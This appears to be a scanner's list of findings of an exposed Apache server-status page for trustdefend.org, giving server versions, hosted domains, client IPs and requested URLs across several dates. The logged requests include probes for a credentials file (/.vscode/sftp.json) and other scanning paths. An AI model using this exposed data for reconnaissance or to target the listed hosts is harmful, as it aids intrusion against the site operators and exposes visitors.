      178.23.189.67vashjeludok.com:8080GET /podzheludochnaja/p-bolezni/pankreatit/menu.html HTTP/1.0
      
      32-2276-0/0/773844.
      0.0922400.00.0080277.97
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-2276-0/
      Found on 2024-06-01 21:45
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42f85ae6ff

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 30-May-2024 12:33:10 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2220
      Parent Server MPM Generation: 2219
      Server uptime:  58 days 2 hours 52 minutes 12 seconds
      Server load: 11.75 11.53 11.23
      Total accesses: 101967607 - Total Traffic: 10207.3 GB
      CPU Usage: u84.51 s21.8 cu0 cs0 - .00212% CPU load
      20.3 requests/sec - 2.1 MB/second - 105.0 kB/request
      10 requests currently being processed, 12 idle workers
      W_W__...W..W.._W___._W_.__._...W.W.WW...........................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-2219129780/192/4369386W
      0.42000.012.08450395.28
      3.129.72.235ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      1-2219137670/56/4306561_
      0.130150.02.80442462.16
      65.21.226.92shikoku.studio:8080GET /schedule.html HTTP/1.0
      
      2-221985990/259/4243491W
      0.562900.013.80436706.00
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      3-2219165190/4/4176733_
      0.0103760.00.26431313.16
      176.59.142.93japan-tackle.ru:8080GET /blesna-daiwa-laser-chinook-s-14g-pink HTTP/1.0
      
      4-2219140130/50/4102011_
      0.120180.02.98425168.84
      65.21.226.92shikoku.studio:8080GET /schedule.html HTTP/1.0
      
      5-2219-0/0/4055808.
      0.181100.00.00417465.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      6-2219-0/0/3980083.
      0.101900.00.00411285.44
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-2219-0/0/3904169.
      0.12500.00.00398751.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-2219140960/25/3813705W
      0.053600.01.25395468.84
      185.240.102.28genealogie.ru:8080GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&s
      
      9-2219-0/0/3721570.
      0.191400.00.00384193.66
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      10-2219-0/0/3658598.
      0.211200.00.00373469.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      11-2219110360/150/3555083W
      0.32000.09.77371880.00
      95.108.213.216vidook.ru:8080GET /%D0%BC%D1%8F%D0%B3%D0%BA%D0%B0%D1%8F+%D1%87%D0%B8%D1%81%D1
      
      12-2219-0/0/3439485.
      1.971700.00.00356125.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-2219-0/0/3294135.
      0.051300.00.00335466.03
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      14-2219133000/179/3193848_
      0.71020.0170.26329156.50
      52.230.152.109syromonoed.org:8080GET /xforum/cron.php?1717057815 HTTP/1.0
      
      15-2219147850/43/3041685W
      0.09000.01.23315619.34
      66.249.66.42alisapsan.ru:8080GET /itm/3920c3a620931 HTTP/1.0
      
      16-2219147870/82/2896244_
      0.16010.04.26301198.13
      217.113.194.32bestcube.space:8080GET /rostwes/agata-muceniece/ HTTP/1.0
      
      17-221972060/379/2737143_
      0.86019670.029.20282921.03
      54.39.18.217efworld.site:8080GET /Forum/Arbitrazh/stenogramma_1?show_comments=1&p=last HTTP/
      
      18-2219152220/60/2553902_
      0.12010.02.15263206.59
      80.82.76.214vuruguay.ru:8080GET /404-1 HTTP/1.0
      
      19-2219-0/0/2388577.
      0.011600.00.00246643.17
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-2219118560/171/2188317_
      0.43015220.010.89228536.86
      192.0.87.64nzt48shop.ru:8080POST /?rest_route=%2Fjetpack%2Fv4%2Fsync%2Fsettings&_for=jetpac
      
      21-221981560/224/2010310W
      0.462900.014.56210673.84
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      22-2219154730/35/1848754_
      0.0703050.02.72191329.81
      52.230.152.56granit-tomsk.ru:8080GET /po-tsvetu/zelenyj-granit/SEF_%D0%BF%D0%BE,pc.ordering,prod
      
      23-2219-0/0/1662305.
      0.12800.00.00171949.56
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-2219133120/133/1463207_
      0.2701590.07.49155139.41
      213.180.203.84mirmoda24.ru:8080GET /catalog/tufli-libellen_1306581/ HTTP/1.0
      
      25-2219155030/21/1341391_
      0.04014070.02.54135942.36
      94.25.169.248persant.ru:8080GET /index.php?route=product/search&search=Lemark&description=t
      
      26-2219-0/0/1204739.
      0.071800.00.00123565.55
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-2219155070/26/1122733_
      0.050150.03.07114675.38
      65.21.226.92shikoku.studio:8080GET /schedule.html HTTP/1.0
      
      28-2219-0/0/1053636.
      0.012200.00.00111505.26
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-2219-0/0/987875.
      0.002300.00.00102976.65
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-2219-0/0/881863.
      0.05900.00.0089929.26
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-2219155500/35/812244W
      0.07200.01.4383997.24
      217.66.158.65toprybalka.ru:8080GET /wp-admin/ HTTP/1.0
      
      32-2219-0/0/733463.
      0.002000.00.0075381.94
      127.0.0.1
      Found on 2024-05-30 09:33
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42b7d237b4

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Wednesday, 29-May-2024 06:21:36 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2179
      Parent Server MPM Generation: 2178
      Server uptime:  56 days 20 hours 40 minutes 37 seconds
      Server load: 7.79 8.37 9.13
      Total accesses: 99448361 - Total Traffic: 9917.1 GB
      CPU Usage: u79.9 s20.88 cu0 cs0 - .00205% CPU load
      20.2 requests/sec - 2.1 MB/second - 104.6 kB/request
      20 requests currently being processed, 1 idle workers
      WWWWWWW.W_W.WW..WW.WW.......W...................................
      ....W.....W.WW..................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-217842180/22/4269358W
      0.03000.01.44438439.78
      185.210.140.96magic-school.net:8080GET /topic/4672-desyatka-mechey-10-mechey-mladshiy-arkan-kart-t
      
      1-217831930/67/4206756W
      0.11000.03.49430297.28
      159.89.174.87trustdefend.org:8080GET /server-status HTTP/1.0
      
      2-217842460/24/4145812W
      0.03100.00.27424930.59
      142.93.143.8newsvirus.ru:8080GET / HTTP/1.0
      
      3-217837070/53/4080269W
      0.08000.02.98420739.88
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      4-217842470/30/4008231W
      0.05000.01.41413732.59
      69.171.249.118khochu-prodat.ru:8080GET /m/index.php?r=3&category=&srpodrazdel=&srrazdel=&srcomment
      
      5-217843390/23/3960638W
      0.03000.00.81406658.06
      38.242.227.0tiktok-recharge.com:8080POST //wp-login.php HTTP/1.0
      
      6-2178323200/153/3887653W
      0.291600.08.96400615.44
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      7-2178-0/0/3813285.
      0.45900.00.00388284.44
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-2178302200/245/3728939W
      0.44000.026.98385082.06
      87.250.224.212xn--80aedtqhfh.xn--p1ai:8080GET /index.php?cat=227 HTTP/1.0
      
      9-217823320/52/3635800_
      0.09000.03.27374393.19
      95.24.158.194rating-bank.ru:8080GET /favicon.ico HTTP/1.0
      
      10-217823650/99/3575049W
      0.19000.05.53363493.97
      95.108.213.203tourslife.ru:8080GET / HTTP/1.0
      
      11-2178-0/0/3473313.
      0.22500.00.00362593.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-217811430/72/3360960W
      0.13000.012.18346225.72
      83.99.151.68yess24.ru:8080GET /product/mix/ HTTP/1.0
      
      13-2178226970/342/3219694W
      0.63000.030.24326277.72
      188.32.4.149xn--80aaqffhkcrdg3q.xn--p1ai:80POST /?wc-ajax=get_refreshed_fragments HTTP/1.0
      
      14-2178-0/0/3117426.
      0.00600.00.00319603.50
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-2178-0/0/2971995.
      0.16800.00.00307392.53
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-217843750/21/2828188W
      0.03000.01.44293040.00
      87.250.224.82xn--80aedtqhfh.xn--p1ai:8080GET /index.php?cat=65 HTTP/1.0
      
      17-217844110/14/2673939W
      0.02400.00.20274856.81
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      18-2178-0/0/2492092.
      0.02700.00.00255694.91
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-217844130/18/2330320W
      0.02000.00.32240104.69
      45.80.158.151dagstav.ru:8080GET /ee.php HTTP/1.0
      
      20-217844140/18/2133570W
      0.03000.00.60221675.25
      213.180.203.5xn--80aedtqhfh.xn--p1ai:8080GET /index.php?cat=684 HTTP/1.0
      
      21-2178-0/0/1957482.
      0.0623100.00.00203755.53
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-2178-0/0/1802735.
      0.0523700.00.00185691.03
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-2178-0/0/1619721.
      0.5511700.00.00167235.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-2178-0/0/1422228.
      0.0526400.00.00150557.44
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-2178-0/0/1304821.
      0.0825200.00.00131547.63
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-2178-0/0/1172228.
      0.0427300.00.00120208.40
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-2178-0/0/1089636.
      0.0327500.00.00111217.84
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-2178251890/279/1020730W
      0.505300.030.38107664.87
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      29-2178-0/0/959804.
      0.0923200.00.0099461.01
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-2178-0/0/854727.
      0.0425900.00.0086998.68
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-2178-0/0/788809.
      0.527300.00.0081247.02
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-2178-0/0/713497.
      0.0325800.00.0072788.65
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-2178-0/0/635607.
      0.052430
      Found on 2024-05-29 03:21
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42886e383a

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Tuesday, 28-May-2024 15:22:51 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2148
      Parent Server MPM Generation: 2147
      Server uptime:  56 days 5 hours 41 minutes 53 seconds
      Server load: 10.18 11.09 11.69
      Total accesses: 98256934 - Total Traffic: 9781.9 GB
      CPU Usage: u79.03 s20.54 cu0 cs0 - .00205% CPU load
      20.2 requests/sec - 2.1 MB/second - 104.4 kB/request
      20 requests currently being processed, 0 idle workers
      .WWWWW.W.W...W...W.W.W.W...WW...W...W...WW.W..........W.........
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-2147-0/0/4222177.
      0.031200.00.00432734.56
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      1-2147264200/21/4159242W
      0.05000.02.96424995.50
      185.240.102.28domrozstore.ru:8080GET /shop/podarki-i-dekor/kompozitsii-dlya-doma/interernaya-kom
      
      2-2147242990/39/4098724W
      0.06000.038.52419311.81
      89.113.101.65pmznn.ru:8080GET /wp-json/contact-form-7/v1/contact-forms/3099/feedback/sche
      
      3-2147261800/28/4034538W
      0.051300.01.49415749.88
      185.240.102.28domrozstore.ru:8080POST /wp-admin/admin-ajax.php?action=as_async_request_queue_run
      
      4-2147184820/210/3962258W
      0.45000.010.53408061.84
      89.113.101.65pmznn.ru:8080GET /wp-json/contact-form-7/v1/contact-forms/12171/feedback/sch
      
      5-2147243000/79/3916105W
      0.16000.014.98401556.66
      85.192.1.153pmznn.ru:8080GET /wp-json/contact-form-7/v1/contact-forms/3118/feedback/sche
      
      6-2147-0/0/3843402.
      0.075000.00.00395557.19
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-2147196050/136/3772410W
      0.302200.08.73382954.63
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      8-2147-0/0/3688896.
      0.074600.00.00380588.19
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      9-2147196370/252/3595699W
      0.55000.024.60369852.75
      74.125.151.171statdata.ru:8080GET /largest_cities_russia?ysclid=lwjapgmidd883976362 HTTP/1.0
      
      10-2147-0/0/3534334.
      0.016800.00.00359198.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      11-2147-0/0/3434100.
      0.715500.00.00358043.59
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-2147-0/0/3322447.
      0.074200.00.00341714.13
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-2147243440/59/3183339W
      0.112810.03.71321891.97
      212.35.181.144blue-issyk--kul.ru:8080GET /Film_sait_2_570.mp4 HTTP/1.0
      
      14-2147-0/0/3081381.
      0.016600.00.00315449.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-2147-0/0/2940101.
      0.074400.00.00303352.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-2147-0/0/2796007.
      0.085600.00.00289318.63
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-2147243510/67/2643971W
      0.14000.033.01271128.06
      144.126.204.517-uzlov.ru:8080GET / HTTP/1.0
      
      18-2147-0/0/2463634.
      0.804000.00.00252400.31
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-2147243530/102/2302910W
      0.241200.05.54237064.55
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      20-2147-0/0/2107425.
      0.016000.00.00218518.19
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-2147211660/109/1933810W
      0.23000.023.42200773.78
      85.192.1.153pmznn.ru:8080GET /wp-json/contact-form-7/v1/contact-forms/12171/feedback/sch
      
      22-2147-0/0/1779707.
      0.123200.00.00183467.42
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-2147213020/112/1599275W
      0.25000.08.42164879.84
      89.113.101.65pmznn.ru:8080GET /wp-json/contact-form-7/v1/contact-forms/3118/feedback/sche
      
      24-2147-0/0/1402722.
      0.045400.00.00148351.97
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-2147-0/0/1287196.
      0.074300.00.00129319.53
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-2147-0/0/1155918.
      0.016100.00.00118108.34
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-2147244320/97/1074792W
      0.19000.04.83109057.23
      85.192.1.153pmznn.ru:8080GET /wp-json/contact-form-7/v1/contact-forms/3099/feedback/sche
      
      28-2147244330/94/1006962W
      0.23000.015.16106178.00
      89.113.101.65pmznn.ru:8080GET /wp-json/contact-form-7/v1/contact-forms/3117/feedback/sche
      
      29-2147-0/0/945811.
      0.045300.00.0098136.59
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-2147-0/0/843245.
      0.175900.00.0085773.56
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-2147-0/0/777925.
      0.035200.00.0080193.52
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-2147219240/121/703769W
      0.27300.018.2471686.96
      37.29.41.5blue-issyk--kul.ru:
      Found on 2024-05-28 12:22
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42fa372fd6

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Monday, 27-May-2024 22:58:05 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2126
      Parent Server MPM Generation: 2125
      Server uptime:  55 days 13 hours 17 minutes 6 seconds
      Server load: 11.13 10.85 10.61
      Total accesses: 96825518 - Total Traffic: 9637.5 GB
      CPU Usage: u81.57 s21 cu0 cs0 - .00214% CPU load
      20.2 requests/sec - 2.1 MB/second - 104.4 kB/request
      9 requests currently being processed, 12 idle workers
      WWW___W___W__.WW_.W._.__.W......................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-2125318040/262/4165133W
      0.5919700.014.19426631.69
      95.108.213.113mebozon.ru:8080GET /index.php?route=extension/payment/yandex_money/market HTTP
      
      1-212595350/233/4101931W
      0.57000.010.25418756.38
      206.189.225.181trustdefend.org:8080GET /server-status HTTP/1.0
      
      2-2125174580/1/4043624W
      0.00900.00.02413818.63
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      3-2125142010/156/3982352_
      0.40010.06.92410044.09
      5.255.231.37vidook.ru:8080GET /error404/ HTTP/1.0
      
      4-2125177550/6/3906979_
      0.01000.00.23402113.16
      80.82.76.214vuruguay.ru:8080GET /404-1 HTTP/1.0
      
      5-2125177870/4/3864140_
      0.0104490.00.34396023.09
      18.221.85.100ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      6-2125118270/222/3790693W
      0.56000.017.15390150.09
      46.138.170.89dsvision.ru:8080HEAD /product/ds-1280zj-xs/ HTTP/1.0
      
      7-2125145320/156/3722023_
      0.38000.08.66377756.88
      64.227.70.2185.240.102.32:8080GET /server HTTP/1.0
      
      8-2125156240/111/3639525_
      0.25000.03.49375460.69
      64.227.70.2185.240.102.32:8080GET /.vscode/sftp.json HTTP/1.0
      
      9-2125177880/5/3546864_
      0.01010.00.02364335.03
      95.217.39.8bystroezdanie.ru:8080GET / HTTP/1.0
      
      10-2125319970/660/3486322W
      1.682400.029.01354414.50
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      11-212588690/159/3388839_
      0.3705030.010.75353634.88
      213.180.203.69budetpolza.ru:8080GET /kulinarija-zdorovja/rastitelnye-napitki/napitok-kofe-bez-k
      
      12-2125150280/135/3278602_
      0.3101090.05.48337211.91
      64.124.8.47mapsshop.ru:8080GET /vektornaja_karta_hutora_gulatdymahi_dwg.html HTTP/1.0
      
      13-2125-0/0/3139565.
      0.032600.00.00317417.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      14-2125165960/65/3039897W
      0.15000.03.21310922.34
      66.249.76.76cartin.ru:8080GET /aksessuary-k-paroochistitelyam/tovar/antiprigarnaya-naklad
      
      15-2125161530/22/2900846W
      0.041400.01.37299340.59
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      16-2125165990/25/2759210_
      0.06010.01.14285823.50
      213.180.203.234vidook.ru:8080GET /error404/ HTTP/1.0
      
      17-2125-0/0/2605844.
      0.24400.00.00267300.63
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-212589420/55/2429988W
      0.1119600.03.05248748.02
      95.108.213.188mebozon.ru:8080GET /index.php?route=extension/payment/yandex_money/market HTTP
      
      19-2125-0/0/2270063.
      0.171200.00.00233970.55
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-2125159170/87/2079290_
      0.1906430.03.20215338.56
      44.214.187.82klubnt.nl:8080GET /link.php?link=25121 HTTP/1.0
      
      21-2125-0/0/1906354.
      0.053700.00.00197753.66
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-2125162130/84/1755400_
      0.26023370.02.29180570.41
      173.252.83.119khochu-prodat.ru:8080GET /index.php?srcity=p529 HTTP/1.0
      
      23-2125162150/67/1576143_
      0.19000.03.07162290.42
      139.99.68.65fillin-izdat.ru:8080GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0
      
      24-2125-0/0/1376558.
      0.158700.00.00145561.31
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-2125127820/100/1266808W
      0.28000.05.77126985.18
      212.192.57.86khochu-prodat.ru:8080GET /contact.php HTTP/1.0
      
      26-2125-0/0/1139004.
      0.094600.00.00116350.53
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-2125-0/0/1057596.
      0.107500.00.00107438.45
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-2125-0/0/991763.
      0.324700.00.00104929.50
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-2125-0/0/930685.
      0.0111700.00.0096578.91
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-2125-0/0/829123.
      0.126200.00.0084355.63
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-2124-0/0/763026.
      0.0854600.00.0078888.82
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
